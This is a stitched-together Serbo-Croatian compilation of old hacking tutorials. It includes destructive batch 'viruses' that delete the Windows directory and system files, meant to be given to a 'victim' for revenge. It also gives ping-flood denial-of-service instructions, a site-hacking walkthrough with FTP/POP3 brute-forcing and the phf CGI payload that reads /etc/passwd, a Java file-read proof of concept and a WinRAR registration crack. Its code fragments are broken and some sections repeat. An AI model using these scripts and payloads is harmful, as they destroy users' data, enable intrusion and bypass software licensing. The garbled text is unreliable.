Professional Documents
Culture Documents
Pravljenje Virusa
miRC Hack
Hackanje
Hack Web
Dos Hackanje
Crackanje
Windows Trikovi
™Dr.Rame™
-*-*-*--- Hakerski internet fazoni --*-*-*
* Anonimnost na internetu
* Prevodjenje IP adrese
* Vas IP?
c:\windows\ipconfig
Upoznavanje
Dobro došli u još jedan tutorial by BaCkSpAcE. Ovaj tutorial može Vam
pomoći da pravite jednostavne viruse.
Ovdje neću pričati on nekoj naprednoj tehnologiji jer je ovaj tutorial za
početnike. Pa ako ste "elite haker"
ne gubite ovdje vrijeme kad možete obarati sistem Micro$oft-a. hehe...
Ovaj tutorial govori o jednostavnom brisanju fajlova. Pa ako ste se
nadali da ćete uništiti svijet, žao mi je ovaj tutorial nije za tebe.
Najkorisnije komande su:(molim Vas otvorite još jedan notepad ili word
pad i zapišite komande jer će Vam kasnije trebati)
@echo off - ova komanda će reći kompjuteru da ne pokazuje sve što radi
u datom trenutku. Dobro ako ne želite da user sazna šta program radi.
echo text ovdje - ova komanda će izbaciti riječi text ovdje na ekran.
Recimo ako želite da stavite "ti papcino" na žrtvin ekran, onda bi napisao
echo ti papcino
Lagano, zar ne?
Primjer br.1
---------------
@echo off
cd\
rd windows
echo TI glupane
echo hahahahhahaha
echo imam te
echo Vidimo se
echo Vozdrica
end
--------------
Hajmo sad ovo analizirati:
@echo off - govori kompjuter da ne izbacuje sve na ekran tako žrtva
ništa neće znati šta se dešava. hehehe
cd\ govori da se pomjeri u c:\ drajv.
rd windows - govori da deletuje direktorij windows iz c:\ . I to znači
vozdra Windows. hahaha
Ostale komande echo TI glupane....govore kompjuteru....pogodite šta.
End -završava program.
Primjer br.2
--------------------
@echo off
cd\
cd windows
@del win.com
@del win.ini
echo Pokušaj sad popravit kompjuter, -Mi u Boga vjerujemo-
End
-------------------
Analiza virusa:
@echo off - govori kompjuteru da bude miran
cd\ - govori kompjuteru da ide na c:\
cd windows - govori kompjuteru da ide sa c:\ na c:\windows
@del win.com - govori kompjuteru da izbriše win.com iz direktorija
windows
@del win.ini - govori kompjuteru da izbriše win.ini iz direktorija windows
echo Pokušaj sad popravit kompjuter, -Mi u Boga vjerujemo- Ako ne znaš
šta znači sad me ubij
End - kraj
Nadam ste da ste zapisali osnovne komande u notepad ili šta već.
Sada je vrijeme da saznate kako da sačuvate fajl, zar ne? Pa to je lako.
U Notepadu ćete da kliknete na File> Save As> ukucajte ime fajla
koje Vi sami želite ali da na kraju upišete .bat
(Npr. mojprogram.bat mojvirus.bat klikni.bat itd itd)
I onda ga posaljite na web ili ga dajte svojoj žrtvi on što treba da uradi
jeste da ga pokrene i on je gotov.
Bilo kako bilo ovo je kraj ovog tutoriala. Nadam ste da ste uživali čitajući
ga. Ja sam se zabavljao dok sam ga pisao.
Ovakve stvari, virusi bi trebali biti korišteni samo za osvetu.
miRC
Kada ste se povezali na server kucate /list da vidite sve kanale ...
kliknete dva puta na zeljeni kanal i tamo ste ... komnda za ulazak na neki
kanal je "/join #kanal" ... =)
aaa vec mi je muka ... sad idemo na instaliranje BNC-a : ) znate ono 24h
dnevno vas nick na irc-u : ) yeah : )
KAKO SAKRITI IP ?!
.. Blah ovo je po meni shit ... bilo je bolje dok nije bilo chanserv-a .. ono
dobijes op ... TakeOver ubacis bota i ql ; ) ali sta je tu je : )
Evo nekih osnovnih komandi koje bi trebalo da znate na BalcanNet-u ...
/msg nickserv register [pass] [email] - registrovanje nick-a
/msg chanserv register [#kanal] [pass] [opis kanala] - registrovanje
kanala
/msg chanserv access [#kanal] add *!*ident@* [level] - dodavanje
access-a
/msg memoserv real all - citanje poruka
/msg seenserv seen [nick] - seen
BalcanNet
irc.drenik.net
irc.yubc.net - po meni najbolji
irc.verat.net
irc.rstel.net
irc.studio-b.co.yu
irc.planetarion.co.yu
ima ih jos dosta al mislim da su ovi najbolji ... a da, portovi servera je
6667 ...
Stoga, dragi moji lameri, newbaji, rookiji i svi koji želite postati
hackerima, citajte me pažljivo.
Ako želite biti hackerom (na podrucju racunalne sigurnosti -
najcešce), cinite ovako:
1. budite SIGURNI da to želite
2. VJERUJTE da to možete
3. OCEKUJTE korist od svoje aktivnosti i rada (financijska,
socijalna - novi prijatelji, reputacija - da postanete poznatiji, kao primjer
drugima ili slicno, ...)
4. NADAJTE se da ce se ono što ocekujete ispuniti
5. USTRAJTE u toj aktivnosti jer treba vremena i truda da
se postane hacker, odnosno 'majstor'
Sav materijal koji vam je potreban da postanete hacker možete
nabaviti tako da pitate starije hackere. Primjerice, za racunalnu
sigurnost
na podrucju UNIX-a idete, npr. IRC:
irc.dal.net:#unix: Molim vas lijepo, gdje da nadem informacije
o racunalnoj sigurnosti na podrucju UNIXa. Želio bih nauciti što je više
moguce o tome pa pitam vas koji znate više od mene.
Ne bojte se reci da ste novi, da ne znate. Ako priznate da ne znate,
UVIJEK ce vam netko pomoci ako ŽELITE da vam se pomogne. Kineska
poslovica
kaže:
"Kad je ucenik spreman, pojavi se ucitelj."
Hackanje
SADRZAJ:
------------------
1. Con, Aux i Nul Exploit
(by BaCkSpAcE)
3. Ping of Death
(by BaCkSpAcE)
5. Malo o NT
(by Perun)
===============================================
=========
===============================================
=========
===============================================
=========
3. Ping of Death
----------------------------
Ping of Death je isto jedna varijanta Denial of Service napada.
Izvodi se tako shto cesh da otkucash 'ping adresa -n 9999999'
i uz to treba da nadjesh rachunare sa brzim linijama.Tako su
gospoda koja je napala yahoo.com i uradila.Uzeli su par mocnih
kompjutera na brzim linijama sa Stanford univerziteta i uradili
'ping www.yahoo.com -n 9999999' i onda je ta linija kojom se
ulazi u Yahoo bila zakrchena velikom kolichinom podataka
(skoro milion pingova) i niko nishta nije mogao uraditi.Naime,
kada se otkuca ova komanda, onda server pochinje da obradjuje
te podatke.Ali poshto je tu ima puno podataka server ce da dugo
dugo radi.Ali ako je to neki slabiji server(mislim na neke klasu
ispod Yahoo), onda ce taj rachunar zablokirati(mozda se chak
i sam resetuje!).Znachi kod slabijih rachunara se dogodi Buffer
Overflow zbog kolichine podataka vece od njegovog buffera,
ali Yahoo je jachi.Izashao je i patch za vecinu ugrozenih
sistema koji onemogucava Efekat Ping of Deatha.
===============================================
=========
===============================================
=========
5. Malo o NT
--------------------------------------------------------------
NT koristi jedan na objectima zasnovan model obezbedjenja
sto znaci da se svaki fajl posebno moze obezbediti na serveru.
Naredna slabost je kod davanja Full controll prava userima - jer pod
tim se podrazumeva jedno skriveno pravo koje se zove File Delete
child I koje je neizbrisivo iz Full control privilegija.Sa tim pravom user
moze da brise read-only files sto moze da bude prilicno nezgodno ako
su ona kljucna za funkcuionisanje NT OS. Jedna od najvaznijih stvari
kod NT obezbedjnja je obezbediti grupu Administratora. Posto clanovi
ove grupe imaju neogranicenu kontrolu, haker ce prvo pokusati da
provali ovaj racun Ukoliko je on suvise dobro obezbedjen haker ce
pokusati da provali racun sa manjim privilegijama a onda sebe doda
grupi administratora (acces-promotion ili t.z.v. step-up attack).
Jedan od najboljih nacina je sve clanove grupe administratora
prebaciti u novu grupu I njoj dati potuna prava (pod drugim imenom)
a onda izbrisati ili ograniciti prava grupe administratora tako da haker
nece znati kojoj grupi I pod kojim imenom mora pripadati da bi dobio
prava administratora. Klasican napad krakera zapocinje time sto ce
sebi pokusati da pribavi password on nekod racuna koji nije toliko
vazan (I obezbedjen) a kasnije pokusati sebe da promovira u racun
sa vise privilegija.Za ovo se koriste t.z.v. brute-power sistemi I
programi koji su nabavljivi djabe na Internetu I koji mogu da u roku
od 7 dana na prosecnoj machini krakrraju passworde I do 16 znakova
dugacke. Za ovo haker mora da dodje do cipherteksta u password
fajlovima Ikoji se cuvaju na serveru u Sam fajlovima I za koje mora
da ima fizicki pristup serveru ili njegovoj fizickoj kopiji (rezervni
serveri - shadow sistemi) I tu dolazi vaznost fizickog pristupa
serveru u prvi plan. Takodje ukljucivanje funkcije Account lockout
otezava posao hakeru (ali I administratoru ako je configuriran na
premali broj pokusaja pa dobija non stop telefoncice od trapavih
usera koji su se zakljucali pogresnim tipkanjem passworda) takodje
I cool-out preiod ne sme biti previse dug jer haker to moze da koristi
za t.z.v. denial of service napade. Takodje dobar racun-policu je na
mestu, cesto menjanje userovih passorda I prisiljavanje usera da
koriste passworde od najmanje 8 znakova I sa ukljucenjem brojeva
,znakova itd kao I koriscenje bezbednisnih programa kao KSA (Kane
security monitor) umanjuju rizik od ovakvih napada. Zbog toga sto se
standardno ne moze ukluciti Account -lockout za Administratorov
racun on je jako ranjiv za ovakve vrste napada .Tu postoji par trikova
da se to izbegne kao davanje drugog imena administratorovom
racunu kao prethodno objasnjeno I onda pravljenje novog usera sa
imenom administrator u dodavanjem njega grupi guests pa mu onda
udaris jedan veoma dugacak password I onda ukljucis audit (koji ne
postoji za administratora) I inda gledas sta se desava I ko sve
pokusava da provali (mamac) "administratorov" racun. Takodje I
zabranjvanje administraturu da se loguje preko networka nego samo
direktno sa konzole umanjuje rizik. Iskljucivanje racuna Guest je
takodje preporuka jer preko njega haker moze da dodje do vaznih
fajlova u registry pod bilo kojim racunom I passwordom.To mu daje
veoma siroka prava I ne samo citanje veoma vaznih fajlova (kao na
primer password fajlova) vec I menjanje osobina fajlova (npr
notepad.exe u haker.exe) kao I pristup veoma vaznim kljucevima
(HKEY_CLASSES_ROOT, HKEY_LOCAL_MACHINE itd ..kao I
ubacivanje Trojanaca na ovaj nacin koji mogu raditi gotovo sve kao
na primer slanje password fajlova pri restartovanju servera...
Sto se napada sa networka tice najvaznije su slabosti koriscene kod
SMTP i HTTP protokola.Zato se bitno da ovi protokoli imaju samo
pristup (na user-nivou -onim fajlovima ili direktorijumima koji su
neophodni za njihov rad).Takodje I svi TCP/UDP portovoi izmedju 135
I 139 treba da budu zacepljeni u vezi sa odbranom od napada
obaziranih na Secure Message blocks) Narocito kod networka koje
koriste SAMBU za komuniciranje sa Unix hostovima i serverima.
Stavljanjem Web servera koji imaju vezu sa internetom na poseban
subnet zasticen firewallom kao I koriscenje internih firewallova za
poverljive servere je jako preporucljivo. Applikacije kao Alerter i
Messanger kao i koriscenje LAN Menadjera su potencijalne security
rupe jer koriste sisteme obezbedjnje koji su jako slabiji od NT-ovok
standardnog nivoa. Na CD-romu na NT4.0 Microsoft je greskom
postavio program rollback.exe kojemu je namena bila da pomogne
administratorima da rediguju podatke u registriju ali umesto toga
brise sve u njemu.Najbolja opcija je izbrisati ovaj fajl ili u najmanju
ruku promeniti mu ime u nesto nepogodivo da bi se izbegla
zloupotreba od hakera. Ukoliko imate masinu sa dual-butom (Unix,
OS2, Novel ) virusi koji napdaju boot-sektor preko ovih drugih OS-ova
imaju uticaj i na NT (Obicno dobijas nesto kao :Boot device nor
accesible). Takodje u SAMBA okruzenju sve r (remote) komande
trebalo bi biti iskljucene (rlogin,rsh,remsh, itd …). Ukoliko se NT sever
koristi kao FTP server bolje je koristiti FTP od IIS 4.0 jer je bolje
zasticen nego standardni ftp od NT-a. Pri koriscenu RAS-a treba imati
u vidu da RAS sifruje samo password sa MD4-hash funkcijom (koji
moze biti snifovan) ostali podaci putuju networkom nesifrovani.
Ukoliko haker provali password a RAS server je povezan u domain
network on onda ima pristup celom domainu.Zato treba RAS uvek
izolovati na poseban firewallon zasticen network od ostatka LAN-a.
Zbog toga su i aktiviranje audita, verifikacije,sifrovanja,call-back
funkcije nephodno radi zastite networka, specijalno u produkcionim
sistemima i sa sistemima sa osetljivim informacijama.
FTP i Telnet passwordi putuju nesifrovani networkom jer ovi protokoli
ne podrzavju ovu funkciju. Posto vecina usera koristi iste passworde
i za logovanje na domeinu neophodnoje sa user-policy prisiliti usere
da koriste razlicite passworde za ovu namenu. Sto se tice ranjivisti
TCP/UDP protokola kod NT-a to prilicno OK osim ranjivih portova od
135-139 koji mogu da se koriste za denial-of-service napada kojom
haker zeli da postigne neke od sledecih rezultata:
- Aktiviranje trojanca kojeg je ranije posstavio I koji postaje aktivan
tek posle reboot-a
- Maskiranje hakerskih aktiviteta (snifovaanja, previsok-procenat ACK
paketa u networku, neobicno ponasanje procesora,)
3
===============================================
=========
===============================================
=========
===============================================
=========
===============================================
=========
===============================================
=========
===============================================
=========
**********************************************************
*****************
SADRZAJ:
------------------
1. Master Index directory traversal vulnerability
(translated by BaCkSpAcE)
8. ALT 255
(written by BaCkSpAcE)
===============================================
========
===============================================
========
===============================================
========
===============================================
========
===============================================
========
---------javacodebase1.html-------------------------------------------
<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590>
<PARAM NAME="ARCHIVE"
VALUE="http://www.guninski.com/gjavacodebase.jar">
<PARAM NAME="CODEBASE" VALUE="file:///c:/">
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</OBJECT>
----------------------------------------------------------------------
--------gjavacodebase.java--------------------------------------------
......
try
{
u = new URL(getParameter("URL"));
InputStream is=u.openStream();
byte ba[]=new byte[1000];
int l=is.read(ba);
InputStream os=u.openConnection().getInputStream();
String s1=new String(ba,0,l);
print(u.toString());
print(s1);
}
.......
----------------------------------------------------------------------
===============================================
========
Patchovi:
Windows 98 i 98SE
http://download.microsoft.com/download/win98/Update/12395/W98/
EN-US/274548USA8.EXE
Windows ME
http://download.microsoft.com/download/winme/Update/12395/Win
Me/
EN-US/274548USAM.EXE
===============================================
========
===============================================
========
8. ALT 255
-------------------
Da li ste ikada pozeleli da napravite direktorijum kojem skoro niko ne
moze prici. Pa evo od ovoga trenutka mozete ispuniti svoju zelju.
Idite u Dos prompt i dodjite u ROOT direktorijum, tj. otkucajte CD\ i
onda lepo otkucajte MD (ALT + 255). Znaci otkucajte MD pa SPACE pa
onda drzite ALT i otkucajte 255 na desnoj strani tastature i zatim
pustite ALT i pritisnite Enter.I onda lepo napisete CD i opet stisnete
ALT i otkucate 255 na desnoj strani i pustite ALT i enter. Sada mozete
u taj direktorijum stavljati sta god pozelite i ne moze vam tu niko
pristupiti sem nekih malo pametnijih. Ovo svakako isprobajte.
Zaboravih da kazem, ako zelite da obrisete taj direktorijum ukucajte
RD ili RMDIR pa onda SPACE pa drzite ALT pa otkucajte 255 i onda
pustite ALT i pritisnite ENTER.Najbolja fora koju ja koristim jeste da
napravite direktorijum po sledecem postupku: otkucajte MD pa onda
pritisnite ALT i otkucajte 255 i onda pustite ALT i u nastavku otkucajte
nesto proizvoljno npr. backspace i onda ce vam se stvoriti zasticeni
drektorijum koji se zove backspace.Ovo je jedna od nesuglasnica
DOSa i WINDOWSa. Ovo se desava zato sto je kod ALT+255 ustvari
NULL to jest praznina i Windows to ne moze da gleda kao znak i
zato ne moze da pristupi tom direktorijumu. Ovo je isprobano i nijedan
program iz Windowsanije uspeo da pristupi tom direktorijumu, dok na
drugoj strani skoro svi programi za dos uspeli su da pristupe tom
direktorijumu i chak da ga obrishu.
WEB HACK
_-SADRZAJ-_
-Objasnjenje
-Kad ovo procitas...
-Sta je potrebno
-Kako ostati anoniman?
-Shell Account...?
-Malo osnovnih Unix komandi
-Nalazenje informacija o siteu
-Iskoristiti rupu
-Ostalo
_-OBASNJENJE-_
_-SHELL ACCOUNT-_
--Operativni sistem
-Objasnicu 2 nacina.Prvi je da se telnetujjete na server ako ima otvoren
telnet port 23.Tamo pise
koji je Operativni Sistem.
-Drugi nacin je netcraft.com
Idite na taj site i kliknite na link na kojem pise "Whats that site running"
ili tako nesto.
Idite na taj link i upisite site koji vas zanima.
Tamo ce pisati sta taj site ima.Postoji jos nacina,kao sto je nmap ....ali
bice ovo dosta za vas.
_-ISKORISTITI RUPU-_
1. Faza
Sajt koji zelite da hacknete, prvo morate
saznat na kojem je serveru i koji je Operativni system.
Logicno je ako je server IIS Microsoft da ce biti operativni system
Win a ne Linux ili nesto drugo. Prvo naucite te vrste servera i operativnih
systema.
Kako to saznat?
Ima milion programa sto to rade a neki od njih su NMAP, Queso itd...
Da vi sad ne bih skidali (uuuh valja naci i skinuti programe :)) odite
na www.netcraft.com i lijepo fino upisite adresu web sajta kojeg zelite
hacknut.
Onda cete dobit sta vam treba. Kada ste to vidjeli, znate sta da radite.
Ako je server Apache i OS Linux, nemojte se previse nadat da cete
hacknut
jer Linux je ako nista sigurniji od Windowsa. Naravno ima exploita
i na njemu ali to vama prepustam da sami nadjete exploite na
nekim hack sajtovima. E ako je IIS Microfost server i to verzija 4.0
onda je to druga prica. Zaista ima hrpa exploita za taj server
i ja znam neke medjutim imajte u vidu da je administrator mozda
zakrpio te rupe. Ova faza je samo uvod, da vidite kakve su to vrste
servera
i OS.
2.Faza
E ako se opredjelite za 1. fazu, onda ovu drugu nemojte ni citat.
Ako se opredjelite za 1. fazu, onda cete trebat trazit exploite
za server na kojem je ta vasa stranica koju trebate
hacnkut. To je i dug proces ali ako se razumijete i znate
sta su exploiti i malo oko njih, onda vam nece biti tesko naci.
E glavna metoda za 1. fazu jeste da skenirate taj server.
Medjuti to je samo jedan dio posla, ali tu vam je dosta toga uradjeno.
Naime, kada skenirate server, onda mozete vidjeti koji exploiti
postoje na njemu! I to je to. Nadjete exploit taj i taj i
isprobate ga. Sad bi vi rekli "E jebote lahko je reci da treba skenirat,
al kako?". Fino, imate milion Exploit skenera, neke mozete skinuti i
na www.nhs-ac.cjb.net sajtu a preporucujem N-Stealth skener.
Trazi ga na Astalavista.com
Da se mi vratimo drugoj fazi.
Ovdje cak nemorate ni znat koji je server i koji je OS.
Sve sto trebate jeste da vidite koji su portovi otvoreni na
tom serveru. Lijepo fino uzmite port skener i skenirajte host
ako to neznate nemojte ni citat dalje ovaj tutorial, jednostavno ga
izbriste. IP adresu takodjer mozete doznat na stranici www.netcraft.com
E postoji jedna dobro poznata metoda. Naime, ako je otvoren
port 21 tj. FTP i ako se mozete ulogovat kao anonimni korisnik, onda sve
sto trebate jeste da pogledate u direktorij /etc/passwd naravno
ako je to dopusteno. Ako je dopusteno i ako uspijte doci do toga
posao je zavrsen, znate sta trebate dalje :)) Medjutim ako to nije
moguce
ako se nemozete ulogovat ili nesto drugo, pogledajte koji
su portovi otvoreni kada skenirate. Sada morate znati malo o
protokolima a imate neke tutore o tome na www.nhs-ac.cjb.net sajtu.
Takodjer bitno je doci do administratorske stranice a ona je obicno
na portu 6075. Naravno trebate naci tu stranicu i port, probajte jos
sa: 65534, 6073, 1260, 5555, 1234 itd...
Ako nadjete taj port, u vas browser upisite (primjer):
http://123.122.34.233:6075
E da se mi vratimo FTP-u. Ako je taj port uopste otvoren onda
lijeo fino skinete wwwhack alat i izaberete FTP metodu. Program ce
onda probat probit user i pass a uzimace rijeci iz rijecnika.
Preporucujem da izaberete metodu sve moguce kombinacije ali to ce
zaista
dugo trajat. Bilo kako bilo, znate sta treba da radite, imate mnogo izbora
pa bujrum.
3. Faza
Ova faza je povezana sa drugom. Naime ako na stranici postoji
POP3 otvoren port, onda isto korstite wwwhack kao i kod
FTP-a. Naravno program ce vas o svemu obavjestiti kada sta otkrije.
4. Faza
U ovoj fazi vam ne treba nista samo program :))
Ovdje cemo korisit DoS napade. Ko nezna sta je to, neka
skine tutor o tome na nhs-ac sajtu i nauci to.
Medjutim sa ovom tehnikom mozete samo "oborit" server.
Ipak, procitajte o tome u posebnom tutoru.
Pokazat cu vam laksi put kako uz ftp access preuzmete password i login
name od neprijatelja.
Ali prvo naucite nesto o file passwordu Kako izgleda primjer
root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom
Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh
root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-
uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper
Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
http://webpage_goes_here/cgi-
bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
dajem primjer
da bih pw file za http://www.webpage.com/ treba da ukucas
http://www.webpage.com/cgi-
bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Telnet i Exploits
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int i,j;
buf = malloc(4096);
i = BUFFER_SIZE-strlen(execshell);
* Komande
* RM (RMDIR)
Primjer: c:\> rm garnet -brise direktorij garnet
* PAUSE - Pauza
Primjer: c:\> pause -za daljni radi pritisnite ENTER
* /? - Help
(Za svaku ovu komandu mozete upisat /? i dobit cete
pomoc za tu komandu)
Primjer: c:\> attrib /?
* Land
Ovdje se radi o takvom napadu sto salje na otvoreni port SYN paket koji
moze
da system obori.
* Smurf-napadi
Ovdje se salje sto vise pingova da bi se dobio sto veci broj odgovora i
tako
bi srusio system zrtve. Za 100 pingova dobija se 1000 odgovora.
* OOB-napadi
* SYN flood
* Ping of Death
* To bi bilo to, jos samo da napomenen ono sto sam rekao na pocetku a
to je da
se veoma tesko zastitit od ovakvih napada. Zato nabavite zastitu da vas
lameri
neuznemiravaju bezze :))
* Program NET
* Program NBTSTAT
Nbtstat [-a remoteime] [-A ip adresa] [-c] [-n] [-R] [-r] [-S]
[-s]
* Ping
Uvod:
Sta je Cracking?
Cracking je jedna vrsta expresije.Ako hoces crack-ovati mozes uvidjeti
da nije lako
razumijeti ispocetka neke osnovne tocke crackinga ali nakon sto ih
razumis imaces potrebno znanje i iskustvo za daljnje usavrsavanje
crackinga.
Ovaj text ce objasniti neke osnovne tacke crackinga,nadam se da cete
razumijeti nacin na koji cu neke tacke objasniti.
Korak 1:
Ovaj text je napravljen za sve pocetnike na netu koji nerazumiju ili
neznaju nista
o ASM-Codu ili o internalnoj funkciji aplikacije.
Potrebni Software:
Za pocetak jedino sto ce nam trebati je W32Dasm8.9 (Windows
disassembler) i HIEW (to je jedan od boljih Hex-Editora mislim da je
najbolji za pocetak).To je sve za pocetak.
Nop (no operation) nop komanda ubija trenutnu operaciju kao naprimjer
provjeravanje jel password validan.
Pocinjemo sa Crackingom:
Kao prvo pocecemo sa WinRAR-om. Otvorite program.
Kao prvo sto mozemo vidjeti na vrhu prozora je "WinRar (unregistred
version)"
Sad cemo kliknuti na "Options"
i poslje toga na "Register".Sad ce se pojaviti windows box.Sad stavite u
prostor za text sta god hocete i kliknite na Ok.Sad ce se pojaviti drugi
prozorcic koji ce vam reci da je registracija propala.To je sve sto
moramo znati.Zatvori WinRar95 i idi na Ms-dos.Sad u Norton
Commanderu napravi dvije kopije Winrara.Jedan nazovi WinRAR95.w32
(za W32Dasm89) a jednu nazovi WinRAR95.exx (sacuvana kopija ako
promijenis pogresne bajtove)
Sad startuj W32Dasm89 i idi na "open file to disassemble".Doci ce
prozor i moci ces izabrati fajl koji hoces da disassembliras.
Izabracemo WinRar95.w32.
Sad W32Dasm pocinje disassembling proces.
Kada je exe fajl disassembliran moze biti da necete vidjeti razumljive
znakove nego WINDINGS pisane linije.Ako se ovo desi idite
na"Dissassembler" pa na "font" I KAO ZADNJE "select font".Sad mozete
izabrati font kojeg cete upotrebljavati u W32D.ASM89. Najbolji font je
Arial.Sad cete vidjeti asm-code.
Nece vam reci puno jer predpostavljam da neznate sta te sve komande
znace.
Sad pritisnite dugme blizu "print" pod nazivom "strn ref"
Pojavi ce se prozor.Sad cete moci vidjeti sve error poruke koje se mogu
pojaviti od exe fajla.Mozete li se sjetiti sta je WinRar rekao kad ste
ukucali pogresan registracijski cod?Rekao je "registration failed"
(REGISTRACIJA PROPALA)
Sad gledaj text i trazi tu poruku.Kada je nadjete dupli klik na
nju.Pojavice se isto onaj prozor kojeg ste dobili kada ste ukucali
pogresan registracijski cod.
Ako ste sve ispravno uradili dobicete na ekranu ovo:
:00413A8F 6A6A push 0000006A
:00413A91 E863640000 call 00419EF9
:00413A96 59 pop ecx
:00413A97 50 push eax
:00413A98 FF7508 push [ebp+08]
*ReferenceTo:USER32.MessageBoxA,Ord:0000h
|
:00413A9B E8120B0100 Call 004245B2
:00413AA0 33C0 xor eax, eax
:00413AA2 A358674200 mov dword ptr [00425758], eax
:00413AA7 A338564200 mov dword ptr [00425638], eax
:00413AAC A34C564200 mov dword ptr [0042564C], eax
:00413AB1 EB56 jmp 00413B09
* P o s s i b l e S t r i n g D a t a R e f f r o m D a t a O b j - > " Wi n R A R
"
* R e f e r e n c e T o : U S E R 3 2 . S e t Wi n d o wT e x t A , O r d : 0 0 0
0h
*PossibleReferencetoStringResourceID=00048
:"normal"
*PossibleReferencetoDialog:ARCINFODLG,CONT
ROL_ID:006C,""
Asm code ide od vrha na prema dole sve dok ne naidje na kraj coda ili
gresku u codu.To znaci da jne/je komandu moramo promijeniti koja je
negdje gore.
Ali kako cemo znati koja je? Sad mozemo pokusati promijeniti svaku i
vidjeti ili mozemo upotrijebiti "Goto Cd loc" dugme koje se nalazi na
vrhu.Kada kliknemo na njega mali prozor ce se pojaviti.Na desnoj strani
prozora ce se pojaviti text box "Code offset (HEX)" Sada bacimo pogled
na asm-code.Vidjecemo liniju "* Referenced by a (U)nconditional ili
(C)onditional Jump At Adress:" linija pored,na njoj se nalazi adresa koju
moramo znati "|:00413A82 (C)" To je broj koji moramo staviti u cod
lokacijski prozor 00413A82.Na ovoj adresi cemo pronaci "jump" skok
koji ce slati svaki put error poruki kada ukucamo pogresan cod.Kliknite
na Ok u cod lokacijskom prozoru.
Sad smo opet negdje u asm-codu.Bar je na liniji koja nam dopusta da
skacemo na poruke.To je jne (jump if not equal).Bar ce promijeniti svoju
boju u zeleno.Sada pogledaj na kraj ekrana.Tu je linija koja izgleda kao:
34985 Pg 467 of 998 Code Data @:00413A82@Offset00013082h u
Fajlu:Winrar95.w32
Jedna stvar koju moramo zapamtiti je broj poslje @offset.To je
00013082.
Sada idi na HIEW (netrebas zatvarati W32Dasm89) pod HIEW-om otvori
WinRAR95.exe.Klikni na F4 i poslje toga izaberi "decode".Sada mozemo
vidjeti sve te jne/je/eax .. komande i klikni F5.Na vrhi lijevom cosku
mozes staviti @offset broj.
Sad klikni F3.Sad smo u mogucnosti da promijenimo vrijednosti.
Promijeni od 75(jne) na 74 (je) i klikni na F9.Onda klikni F10.
Promijenili smo vrijednosti jne. Sada mozemo isprobati da li
radi.Pokrenucemo program otici do registration ukucati bilo kakav cod ili
ime i sta ce biti?
Pojavice se prozor koji ce vam reci da je registracija uspjesna.
Zapamtite ako zelimo manipulisati exe fajlovima ka Winrar moramo ga
zatvoriti na Windows desktopu ili cemo dobiti poruku "error only read
mode"
text by CraX0r
Uvod u Svijet Cracking-a
by CraX0r
BIHNET SECURITY
mad_chroniceia@yahoo.com
Uvod:
Sta je Cracking?
Cracking je jedna vrsta expresije.Ako hoces crack-ovati mozes uvidjeti
da nije lako
razumijeti ispocetka neke osnovne tocke crackinga ali nakon sto ih
razumis imaces potrebno znanje i iskustvo za daljnje usavrsavanje
crackinga.
Ovaj text ce objasniti neke osnovne tacke crackinga,nadam se da cete
razumijeti nacin na koji cu neke tacke objasniti.
Korak 1:
Ovaj text je napravljen za sve pocetnike na netu koji nerazumiju ili
neznaju nista
o ASM-Codu ili o internalnoj funkciji aplikacije.
Potrebni Software:
Za pocetak jedino sto ce nam trebati je W32Dasm8.9 (Windows
disassembler) i HIEW (to je jedan od boljih Hex-Editora mislim da je
najbolji za pocetak).To je sve za pocetak.
Nop (no operation) nop komanda ubija trenutnu operaciju kao naprimjer
provjeravanje jel password validan.
Pocinjemo sa Crackingom:
Kao prvo pocecemo sa WinRAR-om. Otvorite program.
Kao prvo sto mozemo vidjeti na vrhu prozora je "WinRar (unregistred
version)"
Sad cemo kliknuti na "Options"
i poslje toga na "Register".Sad ce se pojaviti windows box.Sad stavite u
prostor za text sta god hocete i kliknite na Ok.Sad ce se pojaviti drugi
prozorcic koji ce vam reci da je registracija propala.To je sve sto
moramo znati.Zatvori WinRar95 i idi na Ms-dos.Sad u Norton
Commanderu napravi dvije kopije Winrara.Jedan nazovi WinRAR95.w32
(za W32Dasm89) a jednu nazovi WinRAR95.exx (sacuvana kopija ako
promijenis pogresne bajtove)
Sad startuj W32Dasm89 i idi na "open file to disassemble".Doci ce
prozor i moci ces izabrati fajl koji hoces da disassembliras.
Izabracemo WinRar95.w32.
Sad W32Dasm pocinje disassembling proces.
Kada je exe fajl disassembliran moze biti da necete vidjeti razumljive
znakove nego WINDINGS pisane linije.Ako se ovo desi idite
na"Dissassembler" pa na "font" I KAO ZADNJE "select font".Sad mozete
izabrati font kojeg cete upotrebljavati u W32D.ASM89. Najbolji font je
Arial.Sad cete vidjeti asm-code.
Nece vam reci puno jer predpostavljam da neznate sta te sve komande
znace.
Sad pritisnite dugme blizu "print" pod nazivom "strn ref"
Pojavi ce se prozor.Sad cete moci vidjeti sve error poruke koje se mogu
pojaviti od exe fajla.Mozete li se sjetiti sta je WinRar rekao kad ste
ukucali pogresan registracijski cod?Rekao je "registration failed"
(REGISTRACIJA PROPALA)
Sad gledaj text i trazi tu poruku.Kada je nadjete dupli klik na
nju.Pojavice se isto onaj prozor kojeg ste dobili kada ste ukucali
